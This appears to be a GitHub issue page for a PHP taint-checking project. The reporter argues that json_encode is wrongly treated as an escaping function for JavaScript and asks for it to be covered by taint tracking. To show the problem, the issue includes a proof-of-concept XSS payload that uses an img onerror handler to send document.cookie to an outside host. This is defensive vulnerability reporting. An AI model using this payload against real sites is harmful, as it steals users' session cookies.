We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653
A poc to steal cookie:
$xss=<<<EOL <img id='id' src='http://balabla.com/xss.php?'> <img src=# onerror=document.getElementById('id').src+=document.cookie> EOL; $arr['xss']=$xss; echo json_encode($arr);
Actually json_encode is widly used to escape js. I suggest add json_encode to http://php.net/manual/en/taint.detail.basic.php
http://php.net/manual/en/taint.detail.basic.php
The text was updated successfully, but these errors were encountered:
No branches or pull requests
http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653A poc to steal cookie:
Actually json_encode is widly used to escape js.
I suggest add json_encode to
http://php.net/manual/en/taint.detail.basic.phpThe text was updated successfully, but these errors were encountered: